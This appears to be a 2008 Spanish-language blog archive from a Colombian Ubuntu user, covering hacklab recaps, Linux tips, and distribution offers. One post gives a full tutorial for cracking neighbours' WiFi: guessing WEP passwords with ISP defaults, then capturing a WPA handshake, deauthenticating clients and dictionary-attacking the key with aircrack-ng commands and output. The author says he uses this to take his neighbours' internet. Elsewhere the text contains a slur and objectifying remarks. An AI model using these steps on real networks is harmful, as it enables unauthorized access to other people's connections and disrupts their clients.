jueves, 30 de octubre de 2008

Corolarios del HackLab #6 + Celebración Nuevo Administrador Ubuntu-Co


Como el otro post me quedo como extenso, aqui les van los corolarios del 6to Hacklab, que por cierto concluyo en una celebración hasta altas horas de la madrugada en parte por la elección de Sirderigo

y otra por la Visita de mi amigo Liontrainer a Bogotá, en Fin Geek Celebratión...
Lo primero, en el Hacklab nos reunimos mas o menos unas 10 personas para hacer una distribucion de Linux, basada en Ubuntu para Colombia, utilizamos varias herramientas como UCK, Remastersys, AptonCd y Reconstructor, basicamente variabamos unicamente los paquetes o programas integrados por defecto y cambiando algunas cosas como el nombre, y las imagenes y tipografias de la presentación, de ahi salio el Arepubuntu que vieron mas arriba, Ideas de todos, y Diseño de Sebastian, hecho netamente en Gimp, luego de esto salimos a departir como buenos muchachos tomandonos algo etilico con motivo de que 2 de los postulados a administradores de Ubuntu Colombia estaban en el Hacklab y que uno de ellos (Sirderigo, ver fotos anexas) fue elegido como nuevo Admin, aqui, sin mas palabras, las imagenes...



Inicios Del hacklab, al fondo a la izquierda (al contrario de los baños) Oswaldo Velez (el que no gano) y German, a la derecha Sebastian, Diseñador del Fondo de ArepuBuntu y a la Izquierda las manos del nuevo Admin Sirderigo con su OLPC


Menos Borrosa que la anterior, los mismos personajes que la anterior, pero abajo izquierda, N.N. y al derecha mi PC que orgullosamente nacio en el Campus Party 2008...


A la Izquierda el nuevo Admin Sirderigo queriendo instalarle MAC OSX Leopard a su computador en plena celebración, (lo geek se lleva en la sangre, ahora se sobreentiende porque algunos no tienen novia)y a la derecha German en actitud sonriente...


OLPK (One Laptop Per Kant) y al fondo derecha sonriente aunque no elegido Oswaldo Velez


Un Primer primerisimo plano del nuevo Admin... esto es no mas para que vean reflejados sus votos ((felicitaciones a todos, que nos deparara el futuro???), mentiras, es broma animo Sirderigo)...


El nuevo Admin de Ubuntu-Co demostrando que todo lo puede, en una mano, el mismo portatil que en la foto anterior, quitandole espacio a nuestro querido Ubuntu para darle paso a la instalación de MAC OSX Leopard, en la otra mano con el OLPH (One Laptop Per Hand) y por si fuera poco en la boca y demostrando que todo es posible para el, tomando cerveza (Mira Mami, sin manos...) (al fondo se ven mujeres algo borrosas, pero esas no venian con nosotros...)

Y ahora si, la verdadera Rumba, para aquellos que desertaron de la celebración y se fueron temprano, aqui si habian mujeres y bastantes... (unas pocas fotos no mas para que no se muerdan tanto)


De Izquierda a derecha Happy T(h)ree Friends ...


Niña Rasta ¿¿¿ Kant Drunk You ???...


El depredador acecha la Presa...


4 Extraños en DC...

Bueno, Recordar es vivir, ahora la proxima reunion sera el 31 de Octubre para descargar Ubuntu Intrepid Ibex, y de paso, seguir celebrando a ver con que salen los de Ubuntu Colombia esta vez...

"No importa cuál sea el resultado previsto. Siempre habrá alguien impaciente por: malinterpretarlo; imitarlo, o creer que ha sido a causa de su teoría favorita." (Kant Rain All Time)

miércoles, 29 de octubre de 2008

La Lasagnabolica... (O Corolarios del Hacklab #6 + Celebración Nuevo Administrador u-co)


Se bien que siempre he criticado todo lo que sea inmoral, ilegal o engorde..., pero esta vez yo confieso ante Dios Todopoderoso y ante vosotros hermanos que he pecado mucho de pensamiento, palabra, obra y omision, por mi culpa, por mi culp... (mentiras, entre otras cosas que culpa tengo yo???, los vecinos por obvios), este sabado que paso estuvimos en el Hacklab para la creación de un Ubuntu personalizado para Colombia, con ciertos paquetes que no vienen instalados por defecto ademas de otros que a nuestra forma de ver sobran, pero esto es harina de otro costal, de esto les comentare mas adelante; en nuestra usual platica entre Geeks,hablamos de que cosas no nos sentiamos orgullosos, y debido a un articulo publicado sobre Linux que sobra decir que me parecio lo mas idiota de este mundo y que a no ser que viene al tema linkearia, miramos que todos los que estabamos en el hacklab eramos Usuarios GNU/Linux pero que ninguno era un Hacker proclamado o amigo de Osama (jajaja, esa Shelley se pasa a ratos) pero sin embargo, todos reconocimos algunos pecados, aqui les va el mio a manera de tutorial...
Tutorial de construcción de Antena Lasagnabolica para un Wireless USB + Auditoria Seguridad Wireless (o sea "como piratearse el internet inalambrico en Cristiano"(Bueno, no tan cristiano))...
Necesitamos:
1. Un plato de Lasagna de aluminio (en lo posible grande y sin usar)
2. Una tarjeta de red inalambrica por USB que soporte el modo monitor.
3. Ubuntu o el sabor GNU/linux que prefieras
4. La suite AirCrack-NG
5. Como siempre en mis Tutos, paciencia, mucha paciencia...

Bueno, como primera medida, este tutorial dista bastante de ser publicado para manos inquietas, o gente con conocimientos previos de Construcción de Antenas Wireless (si, escribi bien "con" pues es algo basico, si tuvieran experiencia, seguro que harian algo mejor como la antena poor man's wifi)...
Primero, lo de la antena es relativamente facil, como esta vaina es para Dummies, solo midan la mitad del plato de aluminio y pasen por ahi su USB (sin la tapa claro esta)y obviamente que quede en el medio del plato con el cuerpo de la USB hacia afuera, es decir que por detras del plato quede el conector USB solamente, ahi conectaremos un extensor USB no mayor a 1.8 mts para no perder potencia de Conexion, y a su vez este al PC en cualquier puerto USB 2.0 Libre...
como creo que esto esta claro, ya notaran que su Inalambrica detecta mas redes que antes y que las que ya detectaba lo hace ahora con mas señal, pues es todo, ya esta hecha tu Lasagnabolica...
(Si, yo se que esto esta re-pendejo, pero creanme que algunos no tenian ni idea lo facil que era darle mas señal a la Wireless, si quieren pueden mejorar la señal dandole mas forma de Plato o Antena al plato de Lasagna, pero si son un poco lochos, lo pueden dejar asi...)
Ahora bien, que si estan de buenas no faltara por ahi alguna red libre, si no, busca primero las de clave WEP, que deben abundar y prueba con las claves logicas 1234567890 12345678 admin clienteETBwifi2007 (Caso Colombia) A1B2C3D4E5 y asi por el estilo, que seguro ya tienen pillada mas de una con esas claves...
si no es asi, tienen mas opciones, pero esto si esta de tarea larga, pues usaremos la suite AirCrack-ng para esto, copio y pego el tuto de mi amigo darkAudaz...

Este manual trata sobre como obtener la clave WPA/WPA2 de una red en la que se usa un sistema de clave compartida (pre-shared keys). Es recomendable leer y aprender como funciona la encriptación WPA/WPA2. En el Wiki puedes encontrar una sección sobre WPA/WPA2.

WPA/WPA2 tiene soporte para otros tipos de autenticación, además de clave compartida. Pero con aircrack-ng SOLO se puede intentar obtener claves pre-compartidas (pre-shared keys). Por lo tanto asegúrate de que airodump-ng te dice que la autenticación de la red es de tipo PSK, y en otro caso, ni intentes averiguarla.

Hay otra diferencia importante entre crackear WPA/WPA2 y WEP. En las claves WEP, se pueden usar métodos “estáticos” de inyección para acelerar el proceso, pero para WPA/WPA2 solo se pueden utilizar técnicas de fuerza bruta. Esto se debe a que la clave no es estática, por lo que recogiendo IVs como para la encriptación WEP, no conseguiremos obtener más rápidamente la clave. Lo único que se necesita para poder iniciar un ataque es el handshake entre el cliente y el AP. El handshake se genera en el momento que el cliente se conecta a la red. Aunque no es exactamente cierto, para los propósitos de este tutorial, diremos que si es verdad: La clave pre-compartida puede tener un tamaño de 8 a 63 caracteres, por lo que parece imposible crackear la clave.

La única forma de obtener la clave es utilizando un diccionario. De tal forma, que si quieres tener una red wireless segura en tu casa, debes usar una clave WPA/WPA2 de 63 caracteres, incluyendo en la misma símbolos especiales.

El hecho de tener que usar fuerza bruta es un inconveniente muy grande. Porque se hace un uso intensivo del procesador del PC, y solo puede probar de 50 a 300 claves por segundo, dependiendo de la CPU. El proceso puede llevar horas o días si se utiliza un diccionario grande. Si estás pensando en generar tu propio diccionario para incluir en el mismo todas las combinaciones posibles, echale un vistazo a este calculador de tiempo: brute force time calculator. Quedarás sorprendido de la gran cantidad de tiempo que es necesaria.

No hay ninguna diferencia entre el crackeo de redes WPA o WPA2. El método de autenticación es básicamente el mismo. Por lo que las técnicas a usar son idénticas.

Es recomendable que cada uno experimente con su propio punto de acceso wireless, para familiarizarse con estas ideas y técnicas. Si no tienes un punto de acceso propio, recuerda que tienes que pedir permiso al propietario del router con el que quieras practicar este ateque.

Antes de nada hay que darles las gracias a los Desarrolladores de la suite Aircrack-ng por crear estas herramientas tan fantásticas.

Por favor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas serán bienvenidas.
Puntos de partida

Suponemos que:

*
Estás usando drivers parcheados para inyección. Usa el injection test Para comprobar que tu tarjeta puede inyectar.
*
Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP. Deberías confirmar que te puedes comunicar con el AP siguiendo estas instrucciones.
*
Usamos la versión 0.9 de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente.

Asegurate de que cumples todas las condiciones, sino no funcionará. En los siguientes ejemplos, tendrás que cambiar “ath0” por el nombre de la interface de tu tarjeta wireless.

En los ejemplos, la opción “guión doble bssid” se muestra como ”- -bssid”. Acuérdate de borrar el espacio entre los dos guiones cuando lo utilices en la vida real. Esto tambien se aplica a ”- -ivs”, ”- -arpreplay”, ”- -deauth”, ”- -channel”, ”- -arp” and ”- -fakeauth”.
Equipo usado

Para seguir este manual en tu casa, debes tener dos tarjetas wireless.

En este tutorial, a continuación puedes ver las que yo he usado:

*
Dirección MAC del PC ejecutando la suite aircrack-ng: 00:0F:B5:88:AC:82
*
Dirección MAC del cliente wireless usando WPA2: 00:0F:B5:FD:FB:C2
*
BSSID (dirección MAC del punto de acceso): 00:14:6C:7E:40:80
*
ESSID (nombre de la red Wireless): teddy
*
Canal del AP: 9
*
Interface Wireless: ath0

Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos.
Solución
Contenidos

El objetivo es capturar el handshake WPA/WPA2 y usarlo con aircrack-ng para obtener la clave pre-compartida.

Esto se puede hacer de forma activa o pasiva. “Activa” significa que podemos acelerar el proceso deautenticando a un cliente wireless. “Pasiva” significa que podemos esperar a que un cliente wireless se autentifique en la red WPA/WPA2. La ventaja de la forma pasiva es que no necesitamos inyectar y por lo tanto podremos utilizarla desde Windows.

Aquí estań los pasos que vamos a seguir:

1.
Colocar la interface wireless en modo monitor y especificar el canal del AP
2.
Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar el handshake
3.
Usar aireplay-ng para deautentificar a un cliente conectado
4.
Ejecutar aircrack-ng para obtener la clave pre-compartida usando ese handshake

Paso 1 - Colocar la interface wireless en modo monitor y especificar el canal del AP

El propósito de este paso es colocar la tarjeta en el modo denominado modo monitor. En este modo la tarjeta wireless puede escuchar y capturar cualquier paquete en el aire. En cambio, en el modo normal la tarjeta solo “escuchará” los paquetes que van destinados a la misma. Escuchando todos los paquetes, podremos más adelante capturar los 4 paquetes que forman el handshake WPA/WPA2. Y opcionalmente tambien podremos deautenticar a un cliente wireless.

Primero para la interface ath0 escribiendo:

airmon-ng stop ath0

El sistema nos responderá:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Escribe “iwconfig” para comprobar que no hay mas interfaces athX. Deberás ver algo como esto:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

Si queda alguna interface athX, para cada una de ellas. Cuando termines, ejecuta “iwconfig” para verificar que ya no queda ninguna.

Ahora, escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9:

airmon-ng start wifi0 9

Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old.

El sistema nos responderá:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Puedes observar que “ath0” aparece colocada en modo monitor.

Para confirmar que la interface está bien configurada, escribimos “iwconfig”.

El sistema nos responderá:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará.

Para ver la correspondencia entre frecuencia y canal, mira: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels y selecciona “Wifi Channel Selection and Channel Overlap” Así obtendrás la frecuencia para cada canal.
Paso 2 - Iniciar airodump-ng para capturar el handshake

El propósito de este paso es ejecutar airodump-ng para capturar los 4 paquetes del handshake en el momento que un cliente se autentifica con el AP en el que estamos interesados.

Escribe:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Donde:

*
-c 9 es el canal de la red wireless
*
- -bssid 00:14:6C:7E:40:80 es la dirección MAC del AP. Esto elimina el tráfico de otras redes.
*
-w psk es el nombre del archivo en el que guardaremos los IVs.
*
ath0 es el nombre de nuestra interface.

Importante: NO uses la opción ”- -ivs”. Debes capturar los paquetes enteros.

A continuación puedes ver una imagen en la que se vé un cliente wireless conectado a la red:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116

Y ahora una imagen de la red sin clientes conectados:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 17:51

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 0 0 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

Paso 3 - Usar aireplay-ng para deautentificar a un cliente conectado

Este paso es opcional. Solo es necesario realizar este paso si optas por acelerar activamente todo el proceso. El requisito necesario es que se encuentre asociado actualmente con el AP algún cliente wireless. Si no hay ningún cliente wireless asociado al AP, lee el siguiente paso del manual y ten paciencia. No es necesario decir, que si más tarde aparece algún cliente wireless, puedes volver atrás y seguir este apartado del manual.

Lo que se hace en este paso es enviar un mensaje al cliente wireless para desasociarlo con el AP. Entonces el cliente wireless se reautenticará con el AP. En la reautenticacion se generarán los 4 paquetes de autenticacion (handshake) en los que estamos interesados en capturar. Despues los usaremos para intentar obtener la clave precompartida WPA/WPA2.

Prestando atención a la salida del comando airodump-ng del paso anterior, podemos determinar el cliente que se encuentra conectado actualmente. Necesitamos su dirección MAC para el siguiente comando. Abre otra consola y escribe:

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Donde:

*
-0 significa deautenticación
*
1 es el número de deautenticaciones enviadas (puedes enviar infinitas si lo deseas)
*
-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso
*
-c 00:0F:B5:FD:FB:C2 es la dirección MAC del cliente que queremos deautenticar
*
ath0 es el nombre de nuestra interface

A continuación puedes ver la salida del comando:

11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

Con un poco de suerte esto causará que el cliente se tenga que reautentificar y capturaremos los 4 paquetes handshake.
Problemas de uso

*
Los paquetes de deautenticación se envian directamente desde el PC a los clientes. Por lo que se debe estar físicamente cerca de los clientes wireless.

Paso 4 - Ejecutar aircrack-ng para obtener la clave pre-compartida

El propósito de este paso es conseguir la clave WPA/WPA2 precompartida. Para hacer esto, se necesita un diccionario de posibles palabras. Básicamente, aircrack-ng comprueba cada una de esas palabras para mirar si coincide con la clave.

Hay un pequeño diccionario que se incluye en la suite aircrack-ng - “password.lst”. En el Wiki FAQ puedes encontrar una larga lista de diferentes diccionarios. Se puede usar John the Ripper (JTR) para construir un diccionario propio y despues usarlo con aircrack-ng.

Abre otra consola y escribe:

aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Donde:

*
-w password.lst es el nombre del archivo del diccionario. Recuerda que tienes que especificar la ruta completa del archivo si no se encuentra en el mismo directorio.
*
*.cap es el nombre del grupo de archivos que contienen los paquetes capturados. Date cuenta que en este caso usamos el comodín * para incluir varios archivos.

Esta es la salida cuando no se encontró ningún handshake:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

No valid WPA handshakes found.

Cuando ocurre esto tienes que volver al paso 3 (deautenticar al cliente wireless) o esperar más tiempo para ver si se conecta algún cliente y se autentifica al AP.

Esta es la salida cuando se encuentra algún handshake:

Opening psk-01.cap
Opening psk-02.cap
Opening psk-03.cap
Opening psk-04.cap
Read 1827 packets.

# BSSID ESSID Encryption

1 00:14:6C:7E:40:80 teddy WPA (1 handshake)

Choosing first network as target.

En este punto, aircrack-ng intentará encontrar la clave. Dependiendo de la velocidad de la CPU y del tamaño del diccionario, este proceso puede llevar bastante tiempo, incluso días.

A continuación puedes ver que ocurre cuando averigua la clave precompartida:

Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB


Sobra decir, que este proceso bien se lo habian evitado, si hubieran probado las claves basicas mencionadas anteriormente, y que este proceso es inmoral, ilegal y por supuesto engorda, mi excusa es que no me puedo amarrar al contrato por defecto a un año que pide cualquier ISP, y como estoy aqui en este apartamento de paso unicamente, pues nada ahi mis vecinos que me colaboren un poco...

Muchas Gracias a todos por la paciencia, mas tarde subo alguna foto de la Lasagnabolica que todavia obviamente uso, solo que con algunas pequeñas mejoras...
en el proximo post se agrandara lo sucedido en el HackLab para no hacer este tan fucking de largo...

"Antes o después, puede tener la más completa seguridad de que se producirán las circunstancias más desfavorables." (Kant Rain All Time)

viernes, 24 de octubre de 2008

Lo que mas extraño de Windows...


Aunque muchos saben que llevo defendiendo esto del software libre hace rato, hasta hace muy poco que me libre completamente de windows y me pase a Ubuntu, pero luego de este tiempo de trabajar enteramente en un entorno libre, note que algo me faltaba, que extrañaba algo, y esto era el tipico pantallazo azul de cuelgue del sistema operativo (hasta a Bill le ha tocado como vimos en el video)/(para evitar problemas con win-fan-boys, no es que mi ubuntu no se cuelgue, aunque si bien no me ha pasado si no una vez hasta ahora, no saca el pantallazo azul e igual solo se cuelga la aplicacion en particular, no el sistema completo, o sea con reinicar la aplicacion y no el sistema basta y sobra); en mi Windows lo tenia instalado de Protector de Pantalla gracias a los del equipo de Sysinternals; lo que me permitia que cualquiera que utilizara el equipo se llevara su buen susto y dijera que "en casa de herrero azadon de palo", pero esto en linux, grave, pense que con wine lo podria instalar, pero no, aunque wine reconoce otros protectores en formato .scr, este como al parecer al ser una broma pide un disclaimer, wine no lo ejecuta, entonces grave, como sabia que el .scr, era un .exe comun, intente sacar la secuencia de video con resource hacker, pero no fue posible, nunca encontre dicho video, investigando, logre simular el cuelgue no solo de Windows sino de otros sistemas operativos de otra manera que aqui les explico...
En consola tipeamos
sudo apt-get install xscreensaver xscreensaver-data-extra
luego vamos a sistema - preferencias - salvapantallas, nos sale un aviso que el demonio no se esta ejecutando, lo ejecutamos, en la pantalla de la izquierda nos salen los screensaver instalados, seleccionamos el BSOD, desde ahi lo podemos previsualizar; o configurar, alli escogen los cuelgues que quieran ver, entre ellos el de windows 3.1, atari, nvidia, solaris, bsd, linux y otros como para asustar a algunos incautos, aqui les dejo varios pantallazos para el deleite...





Ese ultimo, a pesar de tener de fondo el wallpaper de ubuntu jamas lo he visto en mi sistema (ni que lo vaya a ver), solo si les gusta, desinstalan el gnome screensaver (gscreensaver) y dejan predeterminado el xscreensaver, que tambien les sirve para que coloquen salvapantallas un poco mas decentes que los que vienen por defecto con gnome...

"Es inutil hacer cosas a prueba de tontos, pues los tontos son a veces demasiado ingeniosos" (Kant Rain All Time)

sábado, 18 de octubre de 2008

Una ventana hacia el pasado (A link to the Past) recordar es vivir...


Definitivamente uno sin recuerdos no es nada, hablando hace un rato con mi amigo Liontrainer estaba recordando mis primeras paginas en la Web, hace mas o menos 5 años, en esa epoca la resolucion era de 800*600 la mas popular, puesto que aqui en Colombia la mayoria tenian en esa epoca monitores de 15", todas ellas fueron alojadas en el por entonces gratuito y "sin avisos" Freeservers y por eso estan vigentes todavia, puesto que de otro modo ya las hubieran banneado/retirado al no pagar la cuota anual... Bueno sin mas preambulos ahi les presento mis primeras creaciones.
CyC Sistemas...
www.cycsistemas.8k.com, la primera pagina web de la empresita, hace ya 5 años, empezando en Bogotá y ampliandonos a Pereira, diseño super simple, y super plagiado en algunas partes, (algunos links e imagenes ya no cargan), en su boletin de ultima hora brindaba enlaces para descargar herramientas para eliminar el virus Blaster, tuvo su auge pues el archivo f
ue descargado mas de 300 veces en esa epoca. (ahora la imagen no carga y el link de descarga no sirve)(igual asi sirviera el blaster es como el polio, esta casi erradicado/extinto)
Diseño super plano, sin 5 de gusto, pero nos ayudo a vender algunos
pesos ese año, lamentablemente uno de los socios (Cruz, la segunda c de CyC Sistemas renuncio al proyecto, y yo me quede usando solo el email para algunos de los clientes, claro que no el de MSN por razones que ya algunos sabran...

Mi primer desnudo en la Web...
www.arbolete.4t.com, si, tambien alojada en freeservers, solo que en aquel entonces estaba menos infestada de publicidad, esta fue una pagina que se realizo para hacerles una broma a mis amigos de aquel entonces, Michael y el primo borrachos, Albeiro como mecanico, Daniel mirando unas viejas con la novia al lado, yo desnudo... (tiempos aquellos) pagina diseñada en 1 hora exacta, cero links, cero estilo, solo un pequeño flash de texto hecho con Swish, que no sera lo ultimo, pero para la epoca ufff....

Aroma y Tanga...
www.aromaytanga.4t.com; esta fue la primera pagina destinada con fines comerciales hace ya como 5 años, lo mismo que las anteriores, alojada en freeservers, ahora atestado de publicidad, diseñada para una resolucion no mayor a 800*600 ya explique el porque, y con varios datos curiosos; lo primero es que haciendola me diverti un monton, lo que tome y goze en nombre de la pagina no esta escrito (bueno ahora solo un poco) ademas que nunca hice funcionar el contador de visitas y nunca salio del periodo de construccion, puesto que el bar cambio de administracion y esta pagina no fue aprobada, destacan sus javascripts para el manejo de menus, el boton derecho del mouse restringido (con navegadores actuales sale el aviso pero igual se pueden descargar las imagenes), pagina con marcos, diseñada en Coffecup y Frontpage, la primera de las cuales es una herramienta gratuita, notese que hasta ahora estaba aprendiendo, asi que no te fijes en detalles, ademas que no salio del Beta (en construccion) se diseño en 4 jarteras y media (como de a media hora de trabajo por mucho por jornada, pero si ven las imagenes o han ido al bar me entenderan)...
En fin, estos fueron mis recuerdos, claro que los mios fueron opacados por el mismo Liontrainer al mostrarme sus primeros pinitos en el Blogging, Gracias infinitas por la subida de moral a http://karkzas.blogspot.com/

"Guárdese del día en que no tenga nada que lamentar." (Kant Rain All Time)

Datos Curiosos Sobre Ubuntu...

Por otro lado, me he encontrado con que nuestra distro es tan popular que es digna de paginas, videos y demas cosas graciosas en diferentes lugares, como los diversos logos de UbuntuXXX o que haya un Ubuntu Satanico, o una tira comica basada en Ubuntu; asi que aqui empieza mi lista que espero que algunos de ustedes continue...

- Definicion de Ubuntu en diferentes enciclopedias

Inciclopedia
Uncyclopedia
Wiki de revistas

- Logos de Ubuntu XXX
o instalar los oficiales con Sudo apt-get ubuntu-calendar

- Huevos de Pascua en Ubuntu

Colocar en ejecutar una aplicacion (alt+F2) "free the fish" (sin las comillas)
Colocar en ejecutar una aplicacion (alt+F2) "gegls from outer space" (obviamente todo sin las comillas)
En una consola escribir "apt-get moo"
Este tambien es muy bueno, escribir en una consola en orden estos comandos
aptitude moo
aptitude -v moo
aptitude -v -v moo
aptitude -v -v -v moo
aptitude -v -v -v -v moo
aptitude -v -v -v -v -v moo
aptitude -v -v -v -v -v -v moo
Abrir una hoja de calculo de open office y colocar en una celda =Game("StarWars")
Abrir una hoja de calculo de open office y colocar en una celda =STARCALCTEAM()
Abrir un procesador de texto de open office y escribir StarWriterTeam y presionar F3
Colocar en el navegador Firefox about:mozilla

- Las calcomanias de Ubuntu











- Videos en Youtube
Compiz fusion nuevo plugin
Im a Ubuntu

Ubuntu vs MAC
Pc vs Mac vs Linux
Rogando por un sueño
Instalacion de Vista en 2 minutos
Instalacion de Vista
Enjuto mojamuto Virus en Ubuntu
Enjuto el peor dia de su vida

- Programas curiosos

Richard Stallman Virtual "sudo apt-get install vrms" luego solo corre "vrms" y ve si Stallman esta orgulloso o no de ti...
Hot babe, un monitor de recursos del sistema bastante especial "sudo apt-get hot-babe luego solo ejecutas Alt+F2 hot-babe -i

-Las Tiras Comicas
eric raimond, richard stallman y otros
Ubuntu comic
ubuntu hasta en la sopa


















Y hasta ahi me se, espero sus aportes y haberles aportado algunas risas...

"Es inútil hacer cualquier cosa a prueba de tontos, porque los tontos son muy ingeniosos." (Kant Rain All Time)

martes, 14 de octubre de 2008

Distribuciones Linux Gratis a Toda Colombia



Bueno, como lo bueno hay que compartirlo, aqui publico un listado de las distribuciones linux que poseo, estoy dispuesto a enviarlas al que me las pida cordialmente a traves de correo o recogiendolas si estan en la Ciudad de bogotá Colombia, como interesante para los que no tienen una buena conexion a internet o que los quieran ya testeados el MD5...
Tengo sin un orden especifico
Ubuntu 8.04.1 Hardy Heron en Cd y Dvd para 32 y 64 Bits asi como los alternate
Ubuntu 8.04.1 Server DVD
Kubuntu 7.10
OpenGEU (esto es un Ubuntu con la plataforma Enlightment)
Xubuntu 32 y 64 8.04.1 y los alternates
FluxBuntu 8.04.1
Edubuntu los 2 CDs
Ubuntu Studio 32 y 64 Alternate DVDs
MythBuntu alternate i386 8.04.1
Mini Ubuntu
De esta lista las ultimas versiones estables (no development) a septiembre de 2008
Damn Small Linux
Puppy Linux
E-live 1.0 Gem stable y 1.86 unstable
BackTrack 3
Wifislax
Slackware 12.1
Phlak
Kate OS
Mandriva
OpenSuse v11 2 DVDs
FreeSpire
ZenWalk
Trinity Rescue Kit (Linux Live para rescate de informacion y reseteo de contraseñas windows)
Box (hackear y trabajar discos XboX)
Sabayon CD y DVD i386
Deli Linux
Debian 4.0r3
Knoppix
Gnoppix
Fedora 9 y 8
Guadalinex (de la junta de andalucia en españa, liviano)
MusixGNU
y tambien de otros sistemas operativos no derivados Linux pero con licencias gratuitas
OpenSolaris
Solaris 2008
FreeBSD 7.0 stable (los 6 CDS y el DVD)
PCBSD
React OS
Menuet OS
Eye OS
Igualmente poseo el Opendisc, disco con aplicaciones opensource para windows version ultima stable
estamos participando activamente para instalar una Freedom Toaster en Colombia, asi que si quieres participar en el proyecto un email por favor.
Igualmente estoy aqui en Bogotá para cualquier cosilla...


"Tal vez las cosas no mejoren, pero siempre queda la esperanza de que vayan peor"(Kant Rain All Time)...
"Cuando a alguien le dan demasiadas herramientas, terminara martillando con el alicate" http://kant.4shared.com

Campus Party Colombia 2009


Creo que la imagen lo dijo todo, pero me puso a pensar en muchas cosas, entre ellas para todos los que estuvimos en el campus 2008, sabran que lo mejor de todo no es precisamente dormir, asi que avisen con tiempo para hibernar como los osos por lo menos dos semanas durmiendo para no dormir en todo el campus, que el Red Bull no dio la talla en el 2008, no olvidar eso si, un electroiman lo suficientemente poderoso para acabar con cuanta grabadora, mini componente, Ipod o celular con altavoz exista en la zona de carpas, pra no repetir los vallenatos nocturnos, y sensores de laser para las jugadas de lleva en las carpas con unos 1500VA de descarga (si voy a dormir poquito prefiero hacerlo sin vallenato a toda damier), definitivamente que sea donde sea pero que sea en Colombia (solo que preferiria que no fuera en la costa, no me malentiendan, los costeños son una berraquera pero hasta que hablan o cantan); en Medellin estaria del carajo, pero dudo mucho que resistiria a salir del Campus ppor siete dias, con tal de ir a ver paisitas, pareceria un ventilador de piso, jajaja; definitivamente postulo de patrocinador a PharmaThon, para aquello de la hiperactividad propia del evento, y que esta vez por lo menos suba un poquito la conexion a Internet, que no fue mala, pero podria ser mejor...; por favor, no lleven a nadie obligado al Campus, es lo peor que pueden hacer los patrocinadores, invitando a cuanto Indio encuentran, de esos que cojen el mouse a dos manos, de los que no saben sacar el arroba, de los que tecnologia para ellos es facebook, messenger y salas de chat, que ellos con la conexion del cafe internet de la esquina tienen (claro que si alguno va a ir dispuesto a aprender, bienvenido).
En resumen, avisando con tiempo por favor para no perder ni un solo dia, y esta vez llevar cosas que en realidad se usen y no solo ocupen espacio en la maleta (todavia no se pa que carajos empaque yo una linterna??? y en cambio no lleve unos audifonos o dvds virgenes...)
De por Dios Bendito, organizadores de Campus Party 2009 contraten de nuevo a las impulsadoras de Terra y Renault, pero no a los DJs de Red Bull, ni a los Cocineros, por favor incluir tambien que la Zona para el publico muestre mas que mas de uno de los que pago 3000 pesos para entrar se llevo una imagen errada, veian 2 pabellones y lo de la inclusion genital (perdon digital, en que estaria pensando) y listo, salian y decian que que bobada campus party, que desilusion, se que recibieron mucho por 3000 pesos, pero muchos ni siquiera se dieron cuenta que la real experiencia estaba era adentro... afuera solo veian stand de comidas y red bull y 2 stand que en su mayoria ocupaban stands de telefonica/movistar...
